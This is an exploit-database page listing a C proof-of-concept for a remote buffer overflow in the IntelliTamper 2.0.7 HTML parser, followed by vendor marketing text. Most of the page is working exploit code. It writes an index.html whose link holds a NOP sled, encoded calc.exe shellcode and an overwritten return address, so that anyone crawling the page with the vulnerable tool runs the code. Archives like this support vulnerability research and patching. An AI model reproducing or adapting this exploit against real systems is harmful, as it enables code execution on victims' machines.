Vulners
Lucene search
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)
/*
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow
Just a C version of Guido Landi's discovery.
Written by r0ut3r (writ3r [at] gmail.com)
kit:/home/r0ut3r/public_html # gcc -o intell intell.c
kit:/home/r0ut3r/public_html # ./intell
[+] Building payload
[+] Success writing to index.html
kit:/home/r0ut3r/public_html #
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
FILE *fp;
char payload[491]; /* 464 */
/* calc.exe shellcode x86/alpha_mixed succeeded, final size 344 */
unsigned char shellcode[] =
"\xda\xc3\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x43\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c"
"\x4d\x38\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x44\x45\x42\x58\x45\x51\x4a\x4f\x4c\x4b"
"\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a\x4b\x50"
"\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x46\x51\x49\x50"
"\x4d\x49\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37\x49\x51\x49"
"\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44"
"\x47\x54\x45\x54\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x47\x54\x45"
"\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f"
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a"
"\x4b\x4c\x49\x51\x4c\x51\x34\x43\x34\x48\x43\x51\x4f\x50\x31"
"\x4c\x36\x45\x30\x51\x46\x42\x44\x4c\x4b\x51\x56\x46\x50\x4c"
"\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b"
"\x45\x38\x43\x38\x4b\x39\x4c\x38\x4c\x43\x49\x50\x43\x5a\x50"
"\x50\x43\x58\x4a\x50\x4d\x5a\x45\x54\x51\x4f\x42\x48\x4c\x58"
"\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42\x43\x46"
"\x5a\x51\x4c\x42\x57\x42\x49\x42\x4e\x42\x44\x42\x4f\x42\x57"
"\x43\x43\x51\x4c\x43\x43\x44\x39\x43\x43\x43\x44\x43\x55\x42"
"\x4d\x47\x43\x50\x32\x51\x4c\x43\x53\x45\x31\x42\x4c\x42\x43"
"\x46\x4e\x45\x35\x44\x38\x42\x45\x43\x30\x45\x5a\x41\x41";
char eip[4] = "\x23\x44\x06\x7d";
char html[16] = "<a href='http://";
char chtml[11] = "'>yahhh</a>";
fp = fopen("index.html", "wb");
if (fp == NULL)
{
perror("Failed opening index.html\n");
return EXIT_FAILURE;
}
printf("[+] Building payload\n");
memcpy(payload, html, sizeof(html));
memset(payload+sizeof(html), 0x90, 116);
memcpy(payload+sizeof(html)+116, shellcode, sizeof(shellcode));
memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1, eip, sizeof(eip));
memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1+sizeof(eip), chtml, sizeof(chtml));
fprintf(fp, "%s", payload);
if (fclose(fp) == 0)
printf("[+] Success writing to index.html\n");
else
printf("[-] Failed writing to index.html\n");
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1